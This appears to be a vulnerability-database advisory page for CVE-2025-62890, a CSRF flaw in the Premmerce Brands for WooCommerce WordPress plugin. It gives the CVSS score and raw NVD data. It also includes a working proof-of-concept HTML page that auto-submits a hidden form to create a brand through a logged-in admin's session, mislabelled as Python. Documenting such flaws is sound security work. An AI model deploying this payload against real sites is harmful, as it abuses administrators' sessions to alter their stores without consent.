Security Vulnerability Report
中文
CVE-2025-62890 CVSS 4.3 MEDIUM

CVE-2025-62890

Published: 2025-10-27 02:15:48
Last Modified: 2026-04-27 18:16:28

Description

Cross-Site Request Forgery (CSRF) vulnerability in Premmerce Premmerce Brands for WooCommerce premmerce-woocommerce-brands allows Cross Site Request Forgery.This issue affects Premmerce Brands for WooCommerce: from n/a through <= 1.2.13.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Premmerce Brands for WooCommerce <= 1.2.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62890 --> <!-- This PoC demonstrates the CSRF vulnerability in Premmerce Brands for WooCommerce plugin --> <!-- Target: Add a new brand through CSRF attack --> <!DOCTYPE html> <html> <head> <title>CSRF Attack Demo - CVE-2025-62890</title> </head> <body> <h1>CSRF PoC for Premmerce Brands for WooCommerce</h1> <p>This demonstrates the CSRF vulnerability that allows unauthorized brand creation.</p> <!-- Auto-submit form to create a malicious brand --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="add-brand"> <input type="hidden" name="brand_name" value="Malicious Brand"> <input type="hidden" name="brand_slug" value="malicious-brand"> <input type="hidden" name="brand_description" value="CSRF Attack Inserted"> <input type="hidden" name="submit" value="Add Brand"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the form was submitted.</p> </body> </html> <!-- Attack Scenario: 1. Attacker creates this malicious HTML page 2. Lures a logged-in WordPress admin to visit the page 3. The form auto-submits using the admin's session cookies 4. A new brand is created without the admin's consent -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62890", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:47.883", "lastModified": "2026-04-27T18:16:27.523", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Premmerce Premmerce Brands for WooCommerce premmerce-woocommerce-brands allows Cross Site Request Forgery.This issue affects Premmerce Brands for WooCommerce: from n/a through <= 1.2.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/premmerce-woocommerce-brands/vulnerability/wordpress-premmerce-brands-for-woocommerce-plugin-1-2-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}